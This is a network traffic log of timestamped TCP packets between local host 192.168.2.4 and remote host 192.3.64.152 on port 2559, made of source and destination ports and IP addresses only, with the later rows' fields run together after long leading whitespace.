Dec 5, 2024 18:26:59.341140032 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.341149092 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.341157913 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.341167927 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.341171980 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.341175079 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.341191053 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.341200113 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.379517078 CET | 49742 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:26:59.381762981 CET | 49742 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:26:59.389952898 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.389985085 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.390188932 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.390252113 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.390450954 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.390470028 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.390635967 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.390645981 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.390773058 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.390790939 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.390975952 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.391025066 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.391249895 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.391597033 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.392304897 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.392323971 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.392357111 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.392405033 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.392467976 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.392477036 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.392644882 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.392654896 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.392659903 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.392673016 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.435709953 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.435754061 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.435852051 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.435883045 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.436002016 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.436037064 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.436136007 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.436147928 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.436306953 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.436367989 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.436460018 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.436470032 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.436558962 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.436568022 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.437241077 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.437292099 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.437350988 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.437374115 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.437450886 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.437482119 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.437570095 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.437649012 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.437743902 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.437802076 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.441092014 CET | 49742 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:26:59.443175077 CET | 49742 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:26:59.447591066 CET | 2559 | 49741 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.450057983 CET | 49741 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:26:59.450973988 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.487375975 CET | 49742 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:26:59.489206076 CET | 49742 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:26:59.499391079 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.499495983 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.499594927 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.499778986 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.499893904 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.499912977 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.500019073 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.502692938 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.502804041 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.503257990 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.503355026 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.503386021 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.532949924 CET | 49742 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:26:59.534756899 CET | 49742 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:26:59.562433004 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.562448978 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.564496040 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.564521074 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.566181898 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.566240072 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.566263914 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.568018913 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.568073988 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.570156097 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.570225000 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.570319891 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.572278976 CET | 2559 | 49741 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:59.572398901 CET | 49741 | 2559 | 192.168.2.4 | 192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:59.580713034 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:59.582494974 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:59.583678007 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:59.607543945 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:59.607965946 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:59.607979059 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:59.607990026 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:59.608093977 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:59.608251095 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:59.608484030 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:59.609146118 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:59.609230042 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:59.610040903 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:59.610050917 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:59.610059977 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:59.628020048 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:59.630228996 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:59.652921915 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:59.653000116 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:59.653011084 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:59.653074980 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:59.653151035 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:59.653247118 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:59.653264046 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:59.654582977 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:59.654709101 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:59.654720068 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:59.654747963 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:59.654803038 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:59.692279100 CET255949741192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:59.692338943 CET497412559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:59.700634956 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:59.700685024 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:59.700766087 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:59.700854063 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:59.700920105 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:59.700964928 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:59.701047897 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:59.702373028 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:59.702385902 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:59.702414989 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:59.702459097 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:59.702512026 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:59.705508947 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:59.748027086 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:59.748142004 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:59.748179913 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:59.748332024 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:59.748403072 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:59.748471975 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:59.748516083 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:59.750303030 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:59.750346899 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:59.750411987 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:59.750421047 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:59.750482082 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:59.753473043 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:59.757797956 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:59.812829971 CET255949741192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:59.814088106 CET497412559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:59.814354897 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:59.873653889 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:59.873704910 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:59.873831034 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:59.873891115 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:59.873960972 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:59.874059916 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:59.874109030 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:59.877661943 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:59.877733946 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:59.877868891 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:59.877880096 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:59.877957106 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:59.878633022 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:59.880477905 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:59.934247017 CET255949741192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:59.938080072 CET497412559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:59.940074921 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:59.998464108 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:59.998636961 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:59.998800993 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:59.998878956 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:59.998977900 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:59.999032021 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:59.999115944 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.000315905 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.000602007 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.000840902 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.000894070 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.000977993 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.002013922 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:27:00.003642082 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:27:00.048512936 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:27:00.050158978 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:27:00.053658009 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.053997040 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:27:00.059777975 CET255949741192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.062050104 CET497412559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:27:00.096091986 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:27:00.098048925 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:27:00.122194052 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.122354984 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.122436047 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.122490883 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.122565985 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.122642040 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.122653961 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.123613119 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.123702049 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.123780012 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.123940945 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.124006033 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.144268990 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:27:00.147597075 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:27:00.168885946 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.169043064 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.169127941 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.169156075 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.169250011 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.169398069 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.169408083 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.170269012 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.170424938 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.170542955 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.170644045 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.170689106 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.181972027 CET255949741192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.182055950 CET497412559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:27:00.190618992 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.213973045 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:27:00.215910912 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:27:00.216258049 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.216430902 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.216471910 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.876477957 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.876487017 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.876496077 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.876782894 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.876791954 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.876946926 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.876956940 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.877069950 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.877079964 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.877088070 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.877233982 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.877244949 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.877253056 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.877397060 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.877407074 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.877552032 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.877723932 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.878046036 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.911377907 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:27:00.913496017 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:27:00.919552088 CET255949741192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.920093060 CET497412559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:27:00.921202898 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.921214104 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.921340942 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.921843052 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.921853065 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.923440933 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.923450947 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.924020052 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.924030066 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.924650908 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.924659967 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.924734116 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.924743891 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.924843073 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.924897909 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.924974918 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.924992085 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.925154924 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.925205946 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.925447941 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.925579071 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.925587893 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.925714970 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.956877947 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:27:00.958822012 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:27:00.974205971 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.974217892 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.974339008 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.974347115 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.974355936 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.974366903 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.974469900 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.974483013 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.974620104 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.974628925 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.974637985 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.974647045 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.974901915 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.974910021 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.975620031 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.975778103 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.975790977 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.975925922 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.975938082 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.976075888 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.976085901 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.976094007 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.976337910 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.008347988 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:27:01.009968042 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:27:01.030888081 CET255949742192.3.64.152192.168.2.4
